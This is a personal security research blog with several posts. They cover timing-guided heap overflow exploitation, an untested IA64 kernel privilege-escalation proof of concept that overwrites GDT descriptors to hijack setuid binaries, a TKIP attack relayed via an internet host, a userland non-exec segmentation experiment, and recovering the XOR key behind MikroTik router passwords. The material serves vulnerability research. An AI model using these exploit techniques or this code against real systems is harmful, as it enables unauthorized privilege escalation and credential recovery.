trigger_str = generate_potential_trigger_string() start = time.time() skt.send(trigger_str) rlist, wlist, xlist = select.select([skt], [], [skt], 1.0) stop = time.time() difference = stop - start
This is where I put up my thoughts / random notes on things, and whatever I feel like at the point in time. Usually it will be security focused.
For those who are curious, I used the asciidoc package to generate this website, as I don't have too much motivation to write a page out in html syntax and make it look pretty. Thanks to Steven for his script to generate rss feeds from this page structure. Here's the shell script that makes all the html pages for me.
(added 17/10/2009)
While recently working on a heap overflow, I wanted to be able to exploit remote unknown targets that have executable memory. Just for completeness, Exec-shield and PaX would not have prevented exploitation on the distro's I checked, they just required a couple more offsets. Oh, and -D_FORTIFY_SOURCE=2 does not help either.
Anyways, the vulnerability has some specialities which make it slightly more fun than normal.. During input processing, the heap layout can change considerably, with enough massaging, you can either overwrite a structure with a pointer to a structure which has a function pointer, or cause it to write some data we semi control to a pointer we can control. Given the situation, both are relatively easy to exploit, although read only GOT entries will make the latter method harder against unknown targets. (There are function pointers on the .bss, however it requires a lot more massaging and/or luck to hit in that regards).
Because trying X input strings (where X should allow you to hit it with Y probability) for each address would end up being a lot of attempts / crashes, it would be better to try and isolate a single suitable input strings, then loop over potential memory ranges looking for our code. However, the question then is, "Is it feasible to do so?"
In the case of this particular vulnerability, it is feasible to do that via using information gained from how long it takes to shut down the socket / remote process to crash. The information we gather from this is the time between sending the string, and how long it takes for the socket to shut down, which relates to how much processing was done in the remote process.
If it closes very quickly, it implies we have hit a exit(1) code path due to the heap modification early on. If it takes too long, we've hit another exit(1) code path, but after it's done a lot of heap processing first.
If it hits a little bit before our time, it usually means the massaging was off a little bit, a bit after tends to mean the same.. However, there's enough difference to usually identify the ideal case.
Of course, using timing information is only useful in certain situations (ideally, you're close to the target machine, low/little load on each end, network load is low/lowish).. those challenges can be reduced though by owning a machine close to your target. Also it helps if the vulnerability you're targetting gives you useful timing information.
The below graph information was generated via:
trigger_str = generate_potential_trigger_string() start = time.time() skt.send(trigger_str) rlist, wlist, xlist = select.select([skt], [], [skt], 1.0) stop = time.time() difference = stop - start
and doing that 200 times, sorting, and putting the results into a text file, and having gnuplot graph it for us.
While it could probably be argued that python isn't ideal for gathering such precise timing information, we'll ignore that for now. It's working for this demonstration, which is all I care about :p
In the below graph, red crosses are "uninteresting", and green ones are "interesting". The "interesting" state is a crash that's directly related to the function pointer cleanup code. The blue dot is a crash relating to memset() (usually a pointer we control), and purple is an "other" crash (usually due to our pointer not being aligned properly due to allocation layout).
The above graph paints an interesting picture.. at the beginning, there are some very early exit(1) codepaths, then more around the below the 0.005 time marker.. At around the 0.005 and 160 intersect, we start getting crashes due to our input corrupting the processes heap (blue/purple/green) in a useful way and taking successively longer to crash.
Once we have one of the green crashes, we can use that to bruteforce the section of memory that will lead to code execution.
In closing, I hope this brief article shows some of the benefits that timing can provide when suitable and when exploiting targets when you have little information available.
(added 11/10/2009)
This posting is to clear a backlog of things I've been meaning to post at some stage. They're mostly unfinished due to a lack of motivation.. but here goes:
(started around 23/5/2008)
While recently doing some random research, I was browsing the linux 2.6.25.2 kernel source, in arch/ia64/ia32/. While I was reading over the binfmt_elf32.c file, I stumbled across an interesting comment in the function ia64_elf32_init():
/* * Map GDT below 4GB, where the processor can find it. We need to map * it with privilege level 3 because the IVE uses non-privileged accesses to these * tables. IA-32 segmentation is used to protect against IA-32 accesses to them. */
I thought it was particularly interesting in how they mentioned that segmentation would be used to protect access and modification of the applicable data.
Please keep in mind that I don't have an IA64 box to test this on, so it's currently speculation based on what information I can gather. If you do have a IA64 with IA32 linux emulation feel free to test and report back to me, I'd be interested in finding out :)
The code seems to lay memory out with a 3GB, with a couple of pages above the 3GB mark for GDT, LDT, and TSS.
From the ia32priv.h file, we have:
#define IA32_STACK_TOP IA32_PAGE_OFFSET #define IA32_GATE_OFFSET IA32_PAGE_OFFSET #define IA32_GATE_END IA32_PAGE_OFFSET + PAGE_SIZE /* * The system segments (GDT, TSS, LDT) have to be mapped below 4GB so the * IA-32 engine can * access them. */ #define IA32_GDT_OFFSET (IA32_PAGE_OFFSET + PAGE_SIZE) #define IA32_TSS_OFFSET (IA32_PAGE_OFFSET + 2*PAGE_SIZE) #define IA32_LDT_OFFSET (IA32_PAGE_OFFSET + 3*PAGE_SIZE)
Where IA32_PAGE_OFFSET #define'd to 0xc0000000 in include/asm-ia64/ia32.h.
There appears to be several ways we can access the data. The easiest is probably via the standard system calls that take a pointer and uses it in way, such as read() or write(). Additionally, we can directly modify the data via creating a new descriptor and setting the limit to 4GB (which can be done via the modify_ldt() syscall).
Using the read() / write() mechanism is probably the best way to manipulate the data, and probably most flexible.
Creating a new descriptor is easy enough, the below code shows how to:
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <asm/ldt.h>
#include <stdio.h>
#define TYPE user_desc // modify_ldt_ldt_s for 2.4
int do_ldt(int num, unsigned long base, int type)
{
struct TYPE ldt_entry = {
num, // entry_number
(unsigned long int) (base), // base_address
0xfffff, // limit, 4G
1, // seg_32bit
type, // contents
0, // read_exec_only
1, // limit_in_pages
0, // seg_not_present
1 // usable
};
return modify_ldt(1, &ldt_entry, sizeof(struct TYPE)) == 0;
}
int main(int argc, char **argv)
{
if(do_ldt(0, 0, MODIFY_LDT_CONTENTS_DATA) == 0) {
printf("Failed to modify the ldt\n");
exit(EXIT_FAILURE);
}
// the new segment will be accessible via 0x07, (0 * 8) | user priv | ldt etc.
__asm__ volatile("pushw $7;\
popw %ds;");
printf("We've changed our ds segment descriptor\n");
}
If the above code is being compiled on a 2.4 kernel, the struct user_desc will need to be changed to struct modify_ldt_ldt_s, which can be done via changing the TYPE define above. This should allow direct access according to the comment above. Make sure it's compiled in 32 bit mode, and appropriate emulation options/modules are active.
The code in 2.6.25.2 doesn't do any checking in what memory is now accessible in ia32_ldt.c → write_ldt() function.
I'd like to repeat again that I don't have access to a IA64 box to test this out, but I'm going to attempt to write a couple of proof of concept exploits. Let me know if it works :)
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#define PAGE_SIZE 4096
#define IA32_PAGE_OFFSET 0xc0000000
//#define IA32_PAGE_OFFSET (x == 0 ? x = malloc(4 * 4096) : x)
#define IA32_STACK_TOP IA32_PAGE_OFFSET
#define IA32_GATE_OFFSET IA32_PAGE_OFFSET
#define IA32_GATE_END IA32_PAGE_OFFSET + PAGE_SIZE
#define IA32_GDT_OFFSET (IA32_PAGE_OFFSET + PAGE_SIZE)
#define IA32_TSS_OFFSET (IA32_PAGE_OFFSET + 2*PAGE_SIZE)
#define IA32_LDT_OFFSET (IA32_PAGE_OFFSET + 3*PAGE_SIZE)
unsigned char *x;
int main(int argc, char **argv)
{
int fd;
fd = open("gdt.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
if(fd == -1) {
printf("Failed to open gdt.bin: %m\n");
exit(EXIT_FAILURE);
}
if(write(fd, IA32_GDT_OFFSET, 4096) != 4096) {
printf("Failed to write() 4096 bytes\n");
exit(EXIT_FAILURE);
}
close(fd);
printf("Dumped GDT\n");
fd = open("tss.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
if(fd == -1) {
printf("Failed to open tss.bin: %m\n");
exit(EXIT_FAILURE);
}
if(write(fd, IA32_TSS_OFFSET, 4096) != 4096) {
printf("Failed to write() 4096 bytes\n");
exit(EXIT_FAILURE);
}
close(fd);
printf("Dumped TSS\n");
fd = open("ldt.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
if(fd == -1) {
printf("Failed to open ldt.bin: %m\n");
exit(EXIT_FAILURE);
}
if(write(fd, IA32_LDT_OFFSET, 4096) != 4096) {
printf("Failed to write() 4096 bytes\n");
exit(EXIT_FAILURE);
}
close(fd);
printf("Dumped LDT\n");
}
After thinking about it a little bit, there may be little point in getting ring0 itself, but I haven't completely read through the itanium manuals.
According to the docs I've read so far, io ports need to be explicitly mapped in by the operating system, and enabled. Other "privileged" instructions generate traps.
If ring0 would be useful in some capacity, it could be gained by setting appropriate LDT entries if needed, and overwriting the TSS saved CS register and modifying the privilege level.
However, there would be a way to gain additional privileges if there exists a setuid root x86 binary installed on the system. This would be done via manipulating the GDT base address so that upon execve() of a suid process, the entry point would end up pointing to custom code (probably on the stack), due to segmentation base. From what I've read of the itanium manual, segmentation is used to calculate the real address it accesses (ala x86)
Setting the GDT base would also have the side effect of probably crashing any existing IA32 processes.
Theory:
Calculate where the initial entry point is going to be
Calculate where our stack arguments are going to be
Or a suitable .text / library code location
Modify the GDT base value for USER_CS
Execute a setuid x86 binary.
Randomisation probably won't be an issue due to the personality() syscall :)
Initial entry point will be the entry point in the binary if it's not dynamically linked, if it's dynamic linked, the loaders initial entry point will be the entry point.
Here's some sample code I came up with; I don't know if it works or not since I don't have access to the architecture to test. Don't forget to compile in 32bit mode (-m32 may suffice). If your compiler doesn't generate suitable binaries, compile on a x86 box.
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#define PAGE_SIZE 4096
#define IA32_PAGE_OFFSET 0xc0000000
//#define IA32_PAGE_OFFSET (x == 0 ? x = malloc(4 * 4096) : x)
#define IA32_STACK_TOP IA32_PAGE_OFFSET
#define IA32_GATE_OFFSET IA32_PAGE_OFFSET
#define IA32_GATE_END IA32_PAGE_OFFSET + PAGE_SIZE
#define IA32_GDT_OFFSET (IA32_PAGE_OFFSET + PAGE_SIZE)
#define IA32_TSS_OFFSET (IA32_PAGE_OFFSET + 2*PAGE_SIZE)
#define IA32_LDT_OFFSET (IA32_PAGE_OFFSET + 3*PAGE_SIZE)
#define __USER_CS 0x23
#define __USER_DS 0x2B
unsigned char *x;
/* borrowed from arch/ia64/ia32/ia32priv.h */
#define IA32_PAGE_SHIFT 12 /* 4KB pages */
#define __USER_CS 0x23
#define __USER_DS 0x2B
#define IA32_SEG_BASE 16
#define IA32_SEG_TYPE 40
#define IA32_SEG_SYS 44
#define IA32_SEG_DPL 45
#define IA32_SEG_P 47
#define IA32_SEG_HIGH_LIMIT 48
#define IA32_SEG_AVL 52
#define IA32_SEG_DB 54
#define IA32_SEG_G 55
#define IA32_SEG_HIGH_BASE 56
#define IA32_SEG_DESCRIPTOR(base, limit, segtype, nonsysseg, dpl, segpresent, avl, segdb, gran) \
(((limit) & 0xffff) \
| (((unsigned long) (base) & 0xffffff) << IA32_SEG_BASE) \
| ((unsigned long) (segtype) << IA32_SEG_TYPE) \
| ((unsigned long) (nonsysseg) << IA32_SEG_SYS) \
| ((unsigned long) (dpl) << IA32_SEG_DPL) \
| ((unsigned long) (segpresent) << IA32_SEG_P) \
| ((((unsigned long) (limit) >> 16) & 0xf) << IA32_SEG_HIGH_LIMIT) \
| ((unsigned long) (avl) << IA32_SEG_AVL) \
| ((unsigned long) (segdb) << IA32_SEG_DB) \
| ((unsigned long) (gran) << IA32_SEG_G) \
| ((((unsigned long) (base) >> 24) & 0xff) << IA32_SEG_HIGH_BASE))
/* </borrowed> */
int main(int argc, char **argv)
{
int fd;
unsigned char scratch[4096];
unsigned long long *gdt = (unsigned long *)(scratch);
unsigned long long entry_point;
if(argc != 2) {
printf("%s <gdt offset>\n", argv[0] ? argv[0] : ";PpP");
printf("--> 0xbfffe000 (or wherever your r00tc0de is- <libc entry point> = offset, i think ;p\n");
printf("--> offset probably needs to be aligned so it can be shifted\n");
printf("--> in hex\n");
exit(EXIT_FAILURE);
}
entry_point = strtoul(argv[1], 0, 16);
fd = open("gdt.bin", O_RDWR|O_TRUNC|O_CREAT, 0600);
unlink("gdt.bin");
if(fd == -1) {
printf("Failed to open gdt.bin: %m\n");
exit(EXIT_FAILURE);
}
if(write(fd, IA32_GDT_OFFSET, 4096) != 4096) {
printf("Failed to write() 4096 bytes\n");
exit(EXIT_FAILURE);
}
printf("--> Dumped GDT\n");
if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
printf("Unable to seek to start of fd\n");
exit(EXIT_FAILURE);
}
if(read(fd, scratch, 4096) != 4096) {
printf("Unable to read 4096 bytes from our fd\n");
exit(EXIT_FAILURE);
}
if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
printf("Unable to seek to start of fd\n");
exit(EXIT_FAILURE);
}
// borrowed from ia32_support.c :P, but modified
gdt[__USER_CS >> 3] = IA32_SEG_DESCRIPTOR(entry_point, (IA32_GATE_END-1) >> IA32_PAGE_SHIFT,
0xb, 1, 3, 1, 1, 1, 1);
if(write(fd, scratch, 4096) != 4096) {
printf("Unable to write modified data back\n");
exit(EXIT_FAILURE);
}
if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
printf("Unable to seek backwards\n");
exit(EXIT_FAILURE);
}
printf("--> If things go well, then this should crash once read() returns to userspace. If not, hmm! maybe we moved to another processor afterwards or so?\n");
if(read(fd, IA32_GDT_OFFSET, 4096) != 4096) {
printf("Failed to read() 4096 bytes :(\n");
exit(EXIT_FAILURE);
}
printf("Hrm. It worked. but it hasn't crashed. Maybe re-run a couple of times? Maybe I've missed something?\n");
close(fd);
}
At any rate, spender tested the code up to dumping GDT, which goes to show it can be accessed, and presumably modified (I suspect you could mprotect() if it is made read only at some stage).
At any rate, I haven't been able to test due to lack of access to hardware :p
(started 14/12/2008)
When the TKIP flaw came to light (which allowed you to send a couple of packets to a client station), I played around with the idea of using an attacker controlled machine on the internet to help "conspire" against the client station.
By using the UIP TCP/IP stack, I wrote a program to help attack the client by the following means:
Wireless attacker -> Does TKIP attack, can send some packets to client machine
Wireless attacker -> Sends SYN packets to client machine on "common"
vulnerable ports (139/445/80/23/etc), with source IP of
an internet machine we control
Internet Machine -> Looks for SYN|ACK packets, if found, sets up a suitable
UIP connection structure, and fixes up the seq/ack
numbers. Machine then creates a local socket, and buffers
the data between local socket, and UIP connection to the
attacked machine.
Wireless attacker -> Can then attack the client machine with a bunch of
standard exploits
This type of attack is highly dependant on the network infrastructure in use.. outgoing SYN|ACK's may not be NAT'd properly in NAT environments (due to no incoming SYN seen), firewalls may not allow outgoing connections, with an additional complication that the client attacked may have a firewall enabled, etc.
(added 5/4/2009)
Recently I was asked to help admin a box (amongst other things).. one of the particular concerns was the amount of incoming spam to the box. Usually, I would use postfix + various settings to handle e-mail, but the other admin's wanted to keep qmail.
The box itself is running Gentoo Hardened, with qmail. At some stage, a custom qmail was configured — I wanted to return to using the gentoo packaging system to take care of that for me. After finding out it was patched with something to verify RCPT TO headers against (as opposed to accepting mail for every possible email address at a given domain, then sending bounce messages), I looked for something suitable, and came across this patch. Please see this website for further information.
Unfortunately, the patch didn't require cleanly, so that was fixed. This patch is available here if you want it. It was modified to use /var/qmail/control/moregoodrcptto.cdb as opposed to it's default, as that's how this system I was helping was configured.
Additionally, I wanted SPF verification / rejecting if sending host is authorized. I found a suitable patch here, which (as you guessed) didn't apply cleanly. The updated patch is available here.
Please see the respective websites for more information / configuration changes you may need to make.
In order to use these with Gentoo, you can do the following:
# mkdir /root/qmail_patches # cd /root/qmail_patches # wget http://felinemenace.org/~andrewg/antispam_with_gentoo_netqmail/1_rcptto.patch # wget http://felinemenace.org/~andrewg/antispam_with_gentoo_netqmail/2_spf_filtering.patch # echo QMAIL_PATCH_DIR="/root/qmail_patches" >> /etc/make.conf # emerge netqmail
At which point it will compile netqmail with the patches in /root/qmail_patches.
Additionally, I enabled rblsmtpd in /var/qmail/control/conf-smtpd, via uncommenting and editing the QMAIL_SMTP_PRE variable, to the following:
QMAIL_SMTP_PRE="${QMAIL_SMTP_PRE} rblsmtpd -r sbl-xbl.spamhaus.org"
And, well, that's the end of the changes. If you're looking for anti-spam stuff, I'd suggest you use Postfix, as it's still being developed, and doesn't require random patching to get simple functionality working :-)
(started 4/5/2008, added 5/5/2008)
This document describes how it could feasible to implement a pseudo PaX implementation, completely in userland. The described idea is far more of a play thing, than anything completely serious, for reasons later described. It's more of just random thoughts and experiments.
I don't recall how I got started along this track, except that it was something I've been meaning to look at for a while.
Firstly, we should review how PaX's segmexec operates.
While Linux effectively does not use segmentation by creating 0 based and 4 GB limited segments for both code and data accesses (therefore logical addresses are the same as linear addresses), it is possible to set up segments that allow to implement non-executable pages. The basic idea is that we divide the 3 GB userland linear address space into two equal halves and use one to store mappings meant for data access (that is, we define a data segment descriptor to cover the 0-1.5 GB linear address range) and the other for storing mappings for execution (that is, we define a code segment descriptor to cover the 1.5-3 GB linear address range). Since an executable mapping can be used for data accesses as well, we will have to ensure that such mappings are visible in both segments and mirror each other. This setup will then separate data accesses from instruction fetches in the sense that they will hit different linear addresses and therefore allow for control/intervention based on the access type. In particular, if a data-only (and therefore non-executable) mapping is present only in the 0-1.5 GB linear address range, then instruction fetches to the same logical addresses will end up in the 1.5-3 GB linear address range and will raise a page fault hence allow detecting such execution attempts.
PaX's segmexec works by modifying the Global Descriptor Table which separates code and data requests to different virtual addresses.
Userspace, as far as I know, can't modify the Global Descriptor Table, but it can influence it's own Local Descriptor Table via the modify_ldt() system call. The modify_ldt() syscall can create code and data descriptors easily enough, and we can use call far and return far (amongst other techniques) to change into that selector.
As a sample, let's try and execute a int3 instruction. We'll create a new LDT entry, with a base address of 4096, which means all CS addresses after that's set, has to be subtracted by 4096. And on with the show:
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <fcntl.h>
#include <asm/ldt.h>
asm(".globl debug;\
.type debug, @function;\
debug:;\
int3;\
.size exit, .-exit;\
"
);
extern void debug();
/*
<asm/ldt.h>
struct modify_ldt_ldt_s {
unsigned int entry_number;
unsigned long base_addr;
unsigned int limit;
unsigned int seg_32bit:1;
unsigned int contents:2;
unsigned int read_exec_only:1;
unsigned int limit_in_pages:1;
unsigned int seg_not_present:1;
unsigned int useable:1;
};
#define MODIFY_LDT_CONTENTS_DATA 0
#define MODIFY_LDT_CONTENTS_STACK 1
#define MODIFY_LDT_CONTENTS_CODE 2
*/
int do_ldt(int num, unsigned long base, int type)
{
struct modify_ldt_ldt_s ldt_entry = {
num, // entry_number
(unsigned long int) (base), // base_address
0xfffff, // limit, 4G or so :p
1, // seg_32bit
type, // contents
1, // read_exec_only
1, // limit_in_pages
0, // seg_not_present
1 // usable
};
return modify_ldt(1, &ldt_entry, sizeof(struct modify_ldt_ldt_s)) == 0;
}
int main(int argc, char **argv)
{
short int seg;
if(do_ldt(0, 0x1000, MODIFY_LDT_CONTENTS_CODE) == 0) {
printf("Failed to modify ldt\n");
exit(EXIT_FAILURE);
}
seg = 7; // (0 * 8) + 7
//printf("new segment: %d|%02x\n", seg, seg);
__asm__ volatile("pushw %0;\
pushl %1;\
lret"
:
: "r" (seg), "r" ((unsigned int)(debug) - 0x1000)
);
}
Running the above code under a debugger:
Copyright (C) 2007 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"... (no debugging symbols found) Using host libthread_db library "/lib/libthread_db.so.1". (gdb) r Starting program: /root/drifter/ldt/ldt_wot (no debugging symbols found) (no debugging symbols found) Program received signal SIGTRAP, Trace/breakpoint trap. 0x08047559 in ?? () (gdb) x/4i $eip -1 0x8047558: Cannot access memory at address 0x8047558 (gdb) x/4i $eip - 1 + 4096 0x8048558 <debug>: int3 0x8048559 <do_ldt>: push %ebp 0x804855a <do_ldt+1>: mov %esp,%ebp 0x804855c <do_ldt+3>: sub $0x48,%esp (gdb) i r cs cs 0x7 7
As we can see in the debugger output, it's possible to set a custom CS descriptor, and execute code. Due to the now non-flat memory address space, it also messes with debugging a little bit.
Quickly reviewing what we need to do:
Choose where to split our memory (let's stick with 0x60000000)
Duplicate code to the code section
Handle segmentation violations
Unmap old stack because it's at an inconvenient location.
Doing the above completely correctly would be difficult from userland, but possible if a bit of effort was to be expended.
For the purposes of this article, we'll write it using dietlibc, and make it not that feasible to use.
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <fcntl.h>
#include <asm/ldt.h>
#include <sys/mman.h>
#include <asm/unistd.h>
/*
<asm/ldt.h>
struct modify_ldt_ldt_s {
unsigned int entry_number;
unsigned long base_addr;
unsigned int limit;
unsigned int seg_32bit:1;
unsigned int contents:2;
unsigned int read_exec_only:1;
unsigned int limit_in_pages:1;
unsigned int seg_not_present:1;
unsigned int useable:1;
};
#define MODIFY_LDT_CONTENTS_DATA 0
#define MODIFY_LDT_CONTENTS_STACK 1
#define MODIFY_LDT_CONTENTS_CODE 2
*/
_syscall3(int,modify_ldt,int,op,void*,what,int,len);
/*int modify_ldt(int op, void *what, int len)
{
return syscall(__NR_modify_ldt, op, what, len);
}*/
int do_ldt(int num, unsigned long base, int type)
{
struct modify_ldt_ldt_s ldt_entry = {
num, // entry_number
(unsigned long int) (base), // base_address
0x5ffff, // limit, 1.5G or so :p
1, // seg_32bit
type, // contents
1, // read_exec_only
1, // limit_in_pages
0, // seg_not_present
1 // usable
};
return modify_ldt(1, &ldt_entry, sizeof(struct modify_ldt_ldt_s)) == 0;
}
int do_exit()
{
exit(EXIT_SUCCESS);
}
void vulnerable()
{
int j[1];
int i;
char code[] = "\xcc\xcc\xcc\xcc";
#ifdef HEAP
int addr = strdup(code);
#else
int addr = &code;
#endif
//char *where;
//__asm__("int3;");
for(i = 0; i < 10; i++) j[i] = (unsigned int)(addr);
}
unsigned char *old_stack;
int old_stack_len;
void duplicate_code_mappings()
{
// taken from drifter level 11 code, but modified.
FILE *f;
int hi, low;
char flags[5];
int wot;
int major, minor;
int size;
char remainder[1024];
int ret;
unsigned char *new;
f = fopen("/proc/self/maps", "r");
while(8 == (ret = fscanf(f, "%08x-%08x %[^ \n] %08x %02x:%02x %08x%[^\n]", &low, &hi, flags, &wot, &major, &minor, &size, remainder))) {
if((low & 0x60000000) == 0x60000000) continue;
size = hi - low;
/*
* size = hi - low;
* printf("--> %08x-%d\n", low, size);
printf("--> %08x-%08x %s %d %d:%d %d %s\n", low, hi, flags, wot, major, minor, size, remainder);
*/
// r-xp
if(flags[1] == '-' && flags[2] == 'x') {
printf("--> Duplicating 0x%08x, %d bytes long\n", low, size);
new = mmap(low+0x60000000, size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
if(new == MAP_FAILED) {
printf("Unable to map code duplicate: %s\n", strerror(errno));
exit(EXIT_FAILURE);
}
memcpy(new, low, size);
mprotect(new, size, PROT_READ|PROT_EXEC);
}
old_stack = low;
old_stack_len = size;
}
fclose(f);
//exit(EXIT_FAILURE);
}
#define STKSIZ (4096 * 32)
// more code from drifter level11.. so I'm lazy :P
unsigned char *allocate_stack()
{
int found;
int address;
short int shift;
unsigned char *stack_ptr;
int urand_fd;
urand_fd = open("/dev/urandom", O_RDONLY);
found = 0;
while(!found) {
if(read(urand_fd, &address, 4) != 4) {
printf("Read failure on /dev/urandom: %s\n", strerror(errno));
exit(EXIT_FAILURE);
}
if(read(urand_fd, &shift, 2) != 2) {
printf("Read failure on /dev/urandom: %s\n", strerror(errno));
exit(EXIT_FAILURE);
}
shift &= 4088; // (page_size - 1) - last 4 bits, to align stack
#if 1
address &= 0x5f7fffff; // remove everything except for last 8M of address space
//address |= TOOBIG;
#endif
address &= ~4095; // clear page addr
stack_ptr = mmap(address, STKSIZ, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
if(stack_ptr != MAP_FAILED) found = 1;
}
close(urand_fd);
stack_ptr = (unsigned int)(stack_ptr) + (STKSIZ) - shift;
memset(stack_ptr, 0xcc, shift);
stack_ptr--;
return stack_ptr;
}
void do_vulnerable()
{
munmap(old_stack, old_stack_len);
printf("Hello from do_vulnerable\n");
vulnerable();
do_exit();
}
int main(int argc, char **argv)
{
short int seg;
unsigned char *stack;
if(do_ldt(0, 0x60000000, MODIFY_LDT_CONTENTS_CODE) == 0) {
printf("Failed to modify ldt\n");
exit(EXIT_FAILURE);
}
seg = 7;
duplicate_code_mappings();
stack = allocate_stack();
printf("--> Will unmap old stack starting @ 0x%08x\n", old_stack);
system("cat /proc/$PPID/maps");
printf("Returning to do_vulnerable\n");
__asm__ volatile("movl %0, %%esp;\
movl %%esp, %%ebp;\
pushl %1;\
pushw %2;\
pushl %3;\
lret"
:
: "m"(stack), "m" (do_exit), "r" (seg), "r" ((unsigned int)(do_vulnerable))
);
}
The above was compiled with:
diet gcc -fno-pie -fno-stack-protector ldt_test.c -o ldt_test
The above code creates a new stack mapping (because the original is mapped somewhere around 0xbfff0000) and allocates underneath the cutoff point, in addition, it duplicates code layout via scanning /proc/self/maps for mappings marked executable, and NOT writable.
The vulnerable() function stimulates a stack overflow, pointing to the int3 instruction. Optionally, it can be compiled with -DHEAP, and it will stimulate a heap return address, rather than a stack return address.
Watching it catch heap execute attempts:
GNU gdb 6.7.1 Copyright (C) 2007 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"... (no debugging symbols found) Using host libthread_db library "/lib/libthread_db.so.1". (gdb) r Starting program: /root/drifter/ldt/ldt_wot --> Duplicating 0x08048000, 24576 bytes long --> Will unmap old stack starting @ 0xbfffc000 00110000-00111000 rw-p 00000000 00:00 0 08048000-0804e000 r-xp 00000000 08:01 50639 /root/drifter/ldt/ldt_wot 0804e000-08050000 rw-p 00005000 08:01 50639 /root/drifter/ldt/ldt_wot 08050000-08051000 rwxp 00000000 00:00 0 0d2a4000-0d2c4000 rw-p 00000000 00:00 0 68048000-6804e000 r-xp 00000000 00:00 0 bfffc000-c0000000 rwxp ffffd000 00:00 0 Returning to do_vulnerable Hello from do_vulnerable Program received signal SIGSEGV, Segmentation fault. 0x00111008 in ?? () (gdb) x/4i $eip 0x111008: int3 0x111009: int3 0x11100a: int3 0x11100b: int3
And stack execution attempts:
GNU gdb 6.7.1 Copyright (C) 2007 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"... (no debugging symbols found) Using host libthread_db library "/lib/libthread_db.so.1". (gdb) r Starting program: /root/drifter/ldt/ldt_wot --> Duplicating 0x08048000, 24576 bytes long --> Will unmap old stack starting @ 0xbfff4000 00110000-00111000 rw-p 00000000 00:00 0 063c3000-063e3000 rw-p 00000000 00:00 0 08048000-0804e000 r-xp 00000000 08:01 50635 /root/drifter/ldt/ldt_wot 0804e000-08050000 rw-p 00005000 08:01 50635 /root/drifter/ldt/ldt_wot 08050000-08051000 rwxp 00000000 00:00 0 68048000-6804e000 r-xp 00000000 00:00 0 bfff4000-c0000000 rwxp ffff5000 00:00 0 Returning to do_vulnerable Hello from do_vulnerable Program received signal SIGSEGV, Segmentation fault. 0x063e25b1 in ?? () (gdb) x/4i $eip 0x63e25b1: int3 0x63e25b2: int3 0x63e25b3: int3 0x63e25b4: int3
This idea would be easily implemented in the ELF loader (ld.so, not kernel) if it laid out the memory correctly, and probably remapped the stack to a lower address. It would also have to hook stuff like mmap() and duplicate it if possible/applicable.
Anonymous memory could possibly be handled via making it disk backed, and mapping twice from that.
As opposed to memcpy, it should correctly parse /proc/<pid>/maps, and mmap() from shared libraries correctly.
Dynamically generated code could be handled by marking segments non writable, when attempting to execute them. On attempts to write there again, it would be unmapped from the executable region, and marked writable again. Self modifying code would be handled via this mechanism, albeit slowly.
Duplicating code section can't be completely the same, as we can't duplicate anonymous mappings, etc, if they where to become executable. A work around exists by making it disk backed, however.
You could bypass it by returning to a retf instruction, which would use the CS descriptor from the GDT, which is probably marked 0-4G executable :p
Probably a bunch of other weaknesses.
Doing it from userland is pretty lame :P
Userland Process Scheduling (Another article for another day, maybe an outline soon.)
Since debuggers on 32 bit platforms probably assume a flat memory layout, it could be feasible to use different CS/DS/SS/whatever selectors as a minor obfuscation mechanism.
(added 3/1/2008)
On the 3rd January, manio [at] skyboo [dot] net e-mailed me asking for some hints / tips / advice about how the passwords are stored in the MikroTik Router OS image. (To his credit, he said he realised it was XOR based pretty much after he hit sent the mail). The user/password information is stored in /nova/store/user.dat. His homepage is http://manio.skyboo.net/mikrotik/.
According to him, the following passwords had the following encrypted text:
zero length pw 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0 78 BF DE 06 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01 aaa 29 D3 BF 06 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01 ala 29 DE BF 06 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01 0000 48 8F EE 36 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01
Initially, we can note that :
The bytes after the password length are unchanged.
Characters after changed characters still are hashed the the same.
This made me think it was something trivial such as an XOR based scheme.
If it is, we can work out what the first XOR byte is by:
>>> hex(0x78 ^ ord('0'))
'0x48'
This works due to the properties of XOR.
Continuing on with our analysis / assumption that it is XOR on the second char, we take the suspected xor byte of 0xbf, and XOR them against the decimal value of a and l
>>> hex(0xbf ^ ord('a'))
'0xde'
>>> hex(0xbf ^ ord('l'))
'0xd3'
As we can see, the returned bytes are the same as the second bytes from the "hash" from aaa and ala respectively.
Since we now know the "encryption" key, we can write a decoder trivially. (As a side note, I like Python's doctest module :) )
